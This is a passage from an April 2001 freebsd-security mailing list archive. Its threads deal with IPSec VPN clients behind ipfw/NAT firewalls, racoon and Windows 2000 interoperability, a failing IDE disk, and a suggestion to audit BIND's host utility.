From owner-freebsd-security Sun Apr 1 13:25:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc1.az.home.com (ha1.rdc1.az.home.com [24.1.240.66]) by hub.freebsd.org (Postfix) with ESMTP id CAC9637B71A for ; Sun, 1 Apr 2001 13:25:39 -0700 (PDT) (envelope-from ian351c@home.com) Received: from iansdell ([65.13.57.165]) by mail.rdc1.az.home.com (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20010401202539.UBJW10633.mail.rdc1.az.home.com@iansdell> for ; Sun, 1 Apr 2001 13:25:39 -0700 From: "Ian Cartwright" To: Subject: IPSec VPN Client behind Firewall Date: Sun, 1 Apr 2001 13:25:39 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello All, I have been trying to install the Nortel Contivity Extranet Client on a Windows 2000 box behind my FreeBSD firewall. The firewall is FreeBSD-STABLE (as of about amonth ago) with ipfw and nat running. After, scanning as many newsgroups, mailing lists and web pages as I could find on the subject, I have still not found a way to do this... I have seen a couple discussion in this newsgroup and a (hopefully) promising patch to ipfilter that may help me (and whoever else is out there with my problem)... The web page is: http://www.cs.ndsu.nodak.edu/~davlarso/ipf/ Dave (the author of this patch) apparently has written an IPSec proxy module for ipfilter. Is there any way to incorporate this code into ipfw, which (if my understanding is correct, a small but real possibility ;-) is based on ipfilter source? If so, would this be the forum to put this request to? I am tempted to try to hack this in myself, but I don't understand how (if?) the ipfilter code relates to the ipfw code in the source tree. Cheers... Ian Cartwright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 14:25: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp13.singnet.com.sg (smtp13.singnet.com.sg [165.21.6.33]) by hub.freebsd.org (Postfix) with ESMTP id 9E5A837B71C for ; Sun, 1 Apr 2001 14:25:06 -0700 (PDT) (envelope-from spades@galaxynet.org) Received: from bryan (ad202.166.104.48.magix.com.sg [202.166.104.48]) by smtp13.singnet.com.sg (8.11.2/8.11.2) with SMTP id f31LP0I16500 for ; Mon, 2 Apr 2001 05:25:00 +0800 (SGT) Message-Id: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg> X-Sender: spades@smtp.magix.com.sg X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Mon, 02 Apr 2001 05:35:27 +0800 To: freebsd-security@freebsd.org From: Spades Subject: Re: server kernel error Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I built another new box on a Quantum AS fireball 40G with 128MB kingston on my 800EBmhz I got this problem coming today non stop: Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 status=09 error=04 Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 status=09 error=04 Apr 2 05:21:53 server2 last message repeated 2 times Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD WRITE ERROR blk# 36374687 status=01 error=04 Any idea? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 14:33:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 4385F37B718 for ; Sun, 1 Apr 2001 14:33:35 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id RAA23065; Sun, 1 Apr 2001 17:33:16 -0400 (EDT) (envelope-from rjh@mohawk.net) Date: Sun, 1 Apr 2001 17:33:16 -0400 (EDT) From: Ralph Huntington To: Spades Cc: freebsd-security@FreeBSD.ORG Subject: Re: server kernel error In-Reply-To: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I got this problem coming today non stop: > > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 > status=09 error=04 > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 > status=09 error=04 > Apr 2 05:21:53 server2 last message repeated 2 times > Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD > WRITE ERROR blk# 36374687 status=01 error=04 Looks like a bad drive to me. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 16:11:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from nameserver.austclear.com.au (nameserver.austclear.com.au [192.83.119.132]) by hub.freebsd.org (Postfix) with ESMTP id 4E0B637B719 for ; Sun, 1 Apr 2001 16:11:09 -0700 (PDT) (envelope-from ahl@austclear.com.au) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.70.1]) by nameserver.austclear.com.au (8.9.3/8.9.3) with ESMTP id JAA82379; Mon, 2 Apr 2001 09:11:08 +1000 (EST) Received: from tungsten (tungsten [192.168.70.1]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id JAA00720; Mon, 2 Apr 2001 09:11:08 +1000 (EST) Message-Id: <200104012311.JAA00720@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: "Ian Cartwright" Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPSec VPN Client behind Firewall In-Reply-To: Message from "Ian Cartwright" of "Sun, 01 Apr 2001 13:25:39 MST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 02 Apr 2001 09:11:08 +1000 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ian351c@home.com said: > Dave (the author of this patch) apparently has written an IPSec proxy > module for ipfilter. Is there any way to incorporate this code into > ipfw, which (if my understanding is correct, a small but real > possibility ;-) is based on ipfilter source? If so, would this be the > forum to put this request to? I am tempted to try to hack this in > myself, but I don't understand how (if?) the ipfilter code relates to > the ipfw code in the source tree. Ipfilter and ipfw are related in much the same way as Fortran and C (read "they're not"). However, as ipfilter is supported on FreeBSD you could quite happily change from ipfw to ipfilter and then apply the patches. Note that this will also require changing your NAT daemon as well. Both packages are excellent, so don't be concerned about losing out in some way by switching. Cheers, Tony -- Tony Landells Senior Network Engineer Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 16:56:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 073A137B719 for ; Sun, 1 Apr 2001 16:56:48 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (kill-9.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id HAA17151; Mon, 2 Apr 2001 07:59:16 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Mon, 2 Apr 2001 08:00:15 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.51) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <101241515981.20010402080015@morning.ru> To: Spades Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: server kernel error In-Reply-To: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg> References: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org S> I built another new box on a Quantum AS fireball 40G S> with 128MB kingston on my 800EBmhz S> I got this problem coming today non stop: S> Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 S> status=09 error=04 S> Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 S> status=09 error=04 S> Apr 2 05:21:53 server2 last message repeated 2 times S> Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD S> WRITE ERROR blk# 36374687 status=01 error=04 S> Any idea? 1) I cant clearly understand why it is in `Security' list.... 2) Also, I should say I had such problems using FreeBSD (and Linux) on some VIA chipset based motheboard. No hard drives were guilty, because after motherboard change the problem disappeared. S> To Unsubscribe: send mail to majordomo@FreeBSD.org S> with "unsubscribe freebsd-security" in the body of the message -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 17:58:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 2B84D37B71A for ; Sun, 1 Apr 2001 17:58:25 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 76651 invoked by uid 1000); 2 Apr 2001 00:58:46 -0000 Date: Mon, 2 Apr 2001 02:58:46 +0200 From: "Karsten W. Rohrbach" To: Len Conrad Cc: freebsd-security@freebsd.org Subject: Re: Something's happening with named Message-ID: <20010402025846.C75063@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , Len Conrad , freebsd-security@freebsd.org References: <4630.010329@rostokgroup.com> <5.0.0.25.0.20010329195331.06d46eb0@mail.Go2France.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.0.0.25.0.20010329195331.06d46eb0@mail.Go2France.com>; from LConrad@Go2France.com on Thu, Mar 29, 2001 at 07:54:14PM +0200 X-Arbitrary-Number-Of-The-Day: 42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org couldn't bind just go away in future freebsd releases? im running tinydns since quite some time and i am pretty happy with it. happier than with bind ;-) also somebody should audit /usr/src/contrib/bind/bin/host/host.c since it may (at least a first glance) overruns some buffers since the relaxed use of sprintf() and strcpy() which both are a bad thing [tm] and evil ;-) /k Len Conrad(LConrad@Go2France.com)@2001.03.29 19:54:14 +0000: > > >Any help would be very welcome. > > upgrade to 8.2.3 or 9.1.1 > > Len > > > > http://MenAndMice.com/DNS-training : In Austin, TX; SFO, CA; Paris, > FR > http://BIND8NT.MEIway.com : ISC BIND 8.2.3 "NT3" for NT4 & W2K > http://IMGate.MEIway.com : Build free, hi-perf, anti-abuse mail gateways > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- > 71: 69 with two fingers up your ass. -- George Carlin KR433/KR11-RIPE -- http://www.webmonster.de -- ftp://ftp.webmonster.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 20: 6:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from atom.alles.or.jp (atom.alles.or.jp [210.231.151.1]) by hub.freebsd.org (Postfix) with ESMTP id CAA1137B719 for ; Sun, 1 Apr 2001 20:06:22 -0700 (PDT) (envelope-from fukuda@alles.ad.jp) Received: from fukuda.alles.ad.jp (tokyo-gw.alles.or.jp [210.231.143.251]) by atom.alles.or.jp (8.11.1/3.7W/allesnet) with SMTP id f3236G809106 for ; Mon, 2 Apr 2001 12:06:16 +0900 (JST) Message-Id: <200104020306.AA00720@fukuda.alles.ad.jp> From: fukuda shinichi Date: Mon, 02 Apr 2001 12:06:16 +0900 To: freebsd-security@freebsd.org Subject: Re: server kernel error In-Reply-To: References: MIME-Version: 1.0 X-Mailer: AL-Mail32 Version 1.11 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mr Ralph Huntington wrote: > > I got this problem coming today non stop: > > > > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 > > status=09 error=04 > > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 > > status=09 error=04 > > Apr 2 05:21:53 server2 last message repeated 2 times > > Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD > > WRITE ERROR blk# 36374687 status=01 error=04 > > Looks like a bad drive to me. agree, just plane Broken. ------------------------------ doctor lector looks GOOD. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 20:20:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 34F2F37B71B for ; Sun, 1 Apr 2001 20:20:04 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (kill-9.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id LAA26764; Mon, 2 Apr 2001 11:22:38 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Mon, 2 Apr 2001 11:23:38 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.51) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <43253718998.20010402112338@morning.ru> To: fukuda shinichi Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: server kernel error In-Reply-To: <200104020306.AA00720@fukuda.alles.ad.jp> References: <200104020306.AA00720@fukuda.alles.ad.jp> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org fs> Mr Ralph Huntington wrote: >> > I got this problem coming today non stop: >> > >> > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 >> > status=09 error=04 >> > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 >> > status=09 error=04 >> > Apr 2 05:21:53 server2 last message repeated 2 times >> > Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD >> > WRITE ERROR blk# 36374687 status=01 error=04 >> >> Looks like a bad drive to me. fs> agree, just plane Broken. the cite: "...seven# Feb 11 17:45:19 seven /kernel: ad0: UDMA ICRC READ ERROR blk# 28672808 retrying..." it was a piece of my system logs your comments? I state that the problem wasn't in hdisk, it was in motherboard, cause after switching to Intel chipset none of them came back. and another thing... what relation to security does it all have? none, I deem :) fs> ------------------------------ fs> doctor lector looks GOOD. fs> To Unsubscribe: send mail to majordomo@FreeBSD.org fs> with "unsubscribe freebsd-security" in the body of the message -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 21:11:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from cliff.mfn.org (cliff.mfn.org [204.238.179.8]) by hub.freebsd.org (Postfix) with ESMTP id 5D81F37B719 for ; Sun, 1 Apr 2001 21:11:27 -0700 (PDT) (envelope-from measl@mfn.org) Received: from greeves.mfn.org (greeves.mfn.org [204.238.179.3]) by cliff.mfn.org (8.11.1/8.9.3) with ESMTP id f324BEj19646 for ; Sun, 1 Apr 2001 23:11:16 -0500 (CDT) (envelope-from measl@mfn.org) Date: Sun, 1 Apr 2001 23:11:14 -0500 (CDT) From: "J.A. Terranson" To: freebsd-security@freebsd.org Subject: Inquiry Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Would someone who is either the maintainer of, or very intimately familiar with ftpd please contact me off list? -- Yours, J.A. Terranson sysadmin@mfn.org If Governments really want us to behave like civilized human beings, they should give serious consideration towards setting a better example: Ruling by force, rather than consensus; the unrestrained application of unjust laws (which the victim-populations were never allowed input on in the first place); the State policy of justice only for the rich and elected; the intentional abuse and occassionally destruction of entire populations merely to distract an already apathetic and numb electorate... This type of demogoguery must surely wipe out the fascist United States as surely as it wiped out the fascist Union of Soviet Socialist Republics. The views expressed here are mine, and NOT those of my employers, associates, or others. Besides, if it *were* the opinion of all of those people, I doubt there would be a problem to bitch about in the first place... -------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 21:41:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from mbs.microbiz.net (mbs.microbiz.net [204.244.63.1]) by hub.freebsd.org (Postfix) with ESMTP id 05AB937B719 for ; Sun, 1 Apr 2001 21:41:46 -0700 (PDT) (envelope-from kulraj@microbiz.net) Received: from ska1 (ask.thegurms.com [207.230.227.196]) by mbs.microbiz.net (Postfix) with SMTP id E8C7D1D8C0B for ; Sun, 1 Apr 2001 21:41:43 -0700 (PDT) Message-ID: <001501c0bb2f$b3085a60$64c8a8c0@asknet.com> From: "Kulraj Gurm" To: References: <3.0.32.20010402053527.022b7e40@smtp.magix.com.sg> Subject: Re: server kernel error Date: Sun, 1 Apr 2001 21:45:09 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I had the same problem with Fujitsu drives, the unanimous advise I got was to use IBM drives - which seem to be the only IDE drives that can perform well at ATA66 or ATA100. However, before doing the hard drive upgrade I cvsup'd to 4.3-RC - and display of similar problems on boot vanished? What changed? I really don't know same hardware. Maybe someone out there knows why and can fill in a major gap here. I still changed the drive to IBM and system is running smoothly. So as I see it you have two choices wait for 4.3-RELEASE and see what happens, or get an IBM drive. Regards, Kulraj Gurm ----- Original Message ----- From: "Spades" To: Sent: Sunday, April 01, 2001 2:35 PM Subject: Re: server kernel error > I built another new box on a Quantum AS fireball 40G > with 128MB kingston on my 800EBmhz > > I got this problem coming today non stop: > > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 > status=09 error=04 > Apr 2 05:21:51 server2 /kernel: ad0: HARD READ ERROR blk# 34541487 > status=09 error=04 > Apr 2 05:21:53 server2 last message repeated 2 times > Apr 2 05:21:53 server2 /kernel: ad0: timeout waiting for DRQad0: HARD > WRITE ERROR blk# 36374687 status=01 error=04 > > Any idea? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 22:58:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4811937B71F for ; Sun, 1 Apr 2001 22:58:48 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 6584 invoked by uid 1000); 2 Apr 2001 05:57:41 -0000 Date: Mon, 2 Apr 2001 08:57:40 +0300 From: Peter Pentchev To: "J.A. Terranson" Cc: freebsd-security@freebsd.org Subject: Re: Inquiry Message-ID: <20010402085740.A6377@ringworld.oblivion.bg> Mail-Followup-To: "J.A. Terranson" , freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from measl@mfn.org on Sun, Apr 01, 2001 at 11:11:14PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Apr 01, 2001 at 11:11:14PM -0500, J.A. Terranson wrote: > Would someone who is either the maintainer of, or very intimately familiar > with ftpd please contact me off list? If you're looking for someone to report a possible security problem to, then try security-officer@FreeBSD.org. G'luck, Peter -- I am the thought you are now thinking. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 1 23:37:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id C539137B71B for ; Sun, 1 Apr 2001 23:37:48 -0700 (PDT) (envelope-from sakane@ydc.co.jp) Received: from localhost (tanu.tanu.org [3ffe:501:481d:1000:260:1dff:fe1e:f7d4] (may be forged)) by mine.kame.net (8.11.1/3.7W) with ESMTP id f326iKY83828; Mon, 2 Apr 2001 15:44:20 +0900 (JST) To: jorge@aker.com.br Cc: freebsd-security@freebsd.org Subject: Re: IPSEC: racoon and Win2K In-Reply-To: Your message of "Sat, 24 Mar 2001 16:47:42 -0600" <39F078A4FCEC5D408C23FC3D92DEE4020162B9@tyr.kinsman.lan> References: <39F078A4FCEC5D408C23FC3D92DEE4020162B9@tyr.kinsman.lan> X-Mailer: Cue version 0.6 (010321-0216/sakane) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-Id: <20010402153656U.sakane@ydc.co.jp> Date: Mon, 02 Apr 2001 15:36:56 +0900 From: Shoichi Sakane X-Dispatcher: imput version 20000228(IM140) Lines: 26 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The only problem I've encountered is that, when making Win2K and FreeBSD > interoperate, the IKE's phase 2 only suceeds if > Win2K initiates the process. If racoon is to start it, Win2k will not > accept any proposal for phase 2, complaining that the dh group number > (which should correctly be either 1 or 2) received is 1 or 2 (depending > on the pfs_group setting in racoon.conf) and not null(0). If I try > setting pfs_group to null, I get a parse error.=20 It would be helpful if win2k dumped some messages a little more. please check configurations both of racoon and win2k, and make sure exactly same between them. also try to delete the line, "pfs_group 2;". I could negotiate with win2k when racoon was initiate. > sainfo anonymous > { > # does not matter if 1 or 2, zero (expected by Win2K) won't parse. > pfs_group 2; > > lifetime time 36000 sec; > lifetime byte 50000 KB; > encryption_algorithm 3des,des ; > authentication_algorithm hmac_sha1,hmac_md5; > compression_algorithm deflate ; > } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 1:30: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from zpy.ofi.peoplecall.com (mailzpy.peoplecall.com [62.22.20.186]) by hub.freebsd.org (Postfix) with ESMTP id 8C32537B71B for ; Mon, 2 Apr 2001 01:30:02 -0700 (PDT) (envelope-from tdp@psynet.net) Message-ID: <000a01c0bb4e$8bd4dbc0$01dc11ac@ofi.peoplecall.com> From: "|[TDP]|" To: Subject: Date: Mon, 2 Apr 2001 10:25:58 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01C0BB5F.4EC69BE0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C0BB5F.4EC69BE0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable unsubscribe tdp@psynet.net ------=_NextPart_000_0007_01C0BB5F.4EC69BE0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

unsubscribe tdp@psynet.net

------=_NextPart_000_0007_01C0BB5F.4EC69BE0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 8:23:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (bgm-24-94-35-22.stny.rr.com [24.94.35.22]) by hub.freebsd.org (Postfix) with ESMTP id 86AEB37B71F for ; Mon, 2 Apr 2001 08:23:14 -0700 (PDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.11.3/8.11.3) with ESMTP id f32FN9H27889; Mon, 2 Apr 2001 11:23:10 -0400 (EDT) (envelope-from piechota@argolis.org) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Mon, 2 Apr 2001 11:23:09 -0400 (EDT) From: Matt Piechota To: Ian Cartwright Cc: Subject: Re: IPSec VPN Client behind Firewall In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Apr 2001, Ian Cartwright wrote: > I have been trying to install the Nortel Contivity Extranet Client on a > Windows 2000 box behind my FreeBSD firewall. The firewall is FreeBSD-STABLE > (as of about amonth ago) with ipfw and nat running. After, scanning as many > newsgroups, mailing lists and web pages as I could find on the subject, I > have still not found a way to do this... I have seen a couple discussion in > this newsgroup and a (hopefully) promising patch to ipfilter that may help > me (and whoever else is out there with my problem)... Depending on your setup, this could work for you: I too use the Nortel Client and a FreeBSD-STABLE firewall on my home network. My setup uses private internel IPs and one public IP from my cable provider. I set up natd to forward all packets from $nortel_switch_ip to the internal box. It's not ideal, but it does work. If you want more info, let me know. -- Matt Piechota Finger piechota@emailempire.com for PGP key AOL IM: cithaeron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 9:40: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from alpo.whistle.com (s206m1.whistle.com [207.76.206.1]) by hub.freebsd.org (Postfix) with ESMTP id B9B9637B71A for ; Mon, 2 Apr 2001 09:40:03 -0700 (PDT) (envelope-from erik@whistle.com) Received: from whistle.com (aspen.whistle.com [207.76.205.71]) by alpo.whistle.com (8.9.1a/8.9.1) with ESMTP id JAA10128 for ; Mon, 2 Apr 2001 09:37:19 -0700 (PDT) Message-ID: <3AC8AABF.C2B52283@whistle.com> Date: Mon, 02 Apr 2001 09:37:19 -0700 From: Erik Salander X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.1.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: IPSec and dynamic IP? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a way to setup setkey and racoon.conf to accomodate dynamic IP on the security gateway of a LAN-to-LAN VPN? I have a reply from Soichi below, indicating this isn't part of the KAME distribution, perhaps a patch someplace? I see references like this (from the Borderware site): The BorderWare IPSec VPN supports the use of Main Mode and Aggressive Mode for IKE Phase-1 negotiation. Main Mode provides for increased security during Phase-1 by encrypting the initial IKE traffic at the expense performance. Aggressive Mode is used in cases where the initial traffic cannot be encrypted, as is the case for dynamic IP VPN clients, or when performance is an important factor. So I wonder if there's a combo of things like 0.0.0.0 as a peer IP address (on setkey), some my_identifier alternative other than "address" (in racoon.conf) and aggressive mode that will work. How about for a LAN-to-host configuration, can a FreeBSD-based security gateway accomodate a host with dynamic IP? Thanks again. Erik ======================= My original post to Kame mailing list: > I have a typical LAN-to-LAN IPSec VPN working with FreeBSD 4.2-STABLE > and the latest racoon (20010222a). Here's a policy on one end: > > spdadd 10.3.1.0/24 10.3.2.0/24 any -P in ipsec > esp/tunnel/206.77.205.83-206.77.205.115/require; > > What would I specify for setkey if one of the security gateways had a > dynamically assigned IP address on its public interface? Soichi's reply: KAME doesn't support a dynamically assinged ip address as the end point of the IPSec tunnel. I'm not sure someone may have a pactch which is be able to do that. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 2 11:15:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 0FFD237B722 for ; Mon, 2 Apr 2001 11:15:44 -0700 (PDT) (envelope-from cjclark@alum.mit.edu) Received: from alum.mit.edu ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GB6G1Q00.RW1; Mon, 2 Apr 2001 11:15:26 -0700 Message-ID: <3AC8C1CF.30A5ACAD@alum.mit.edu> Date: Mon, 02 Apr 2001 11:15:43 -0700 From: Crist Clark X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Ian Cartwright Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPSec VPN Client behind Firewall References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ian Cartwright wrote: > > Hello All, > > I have been trying to install the Nortel Contivity Extranet Client on a > Windows 2000 box behind my FreeBSD firewall. The firewall is FreeBSD-STABLE > (as of about amonth ago) with ipfw and nat running. After, scanning as many > newsgroups, mailing lists and web pages as I could find on the subject, I > have still not found a way to do this... I have seen a couple discussion in > this newsgroup and a (hopefully) promising patch to ipfilter that may help > me (and whoever else is out there with my problem)... > > The web page is: 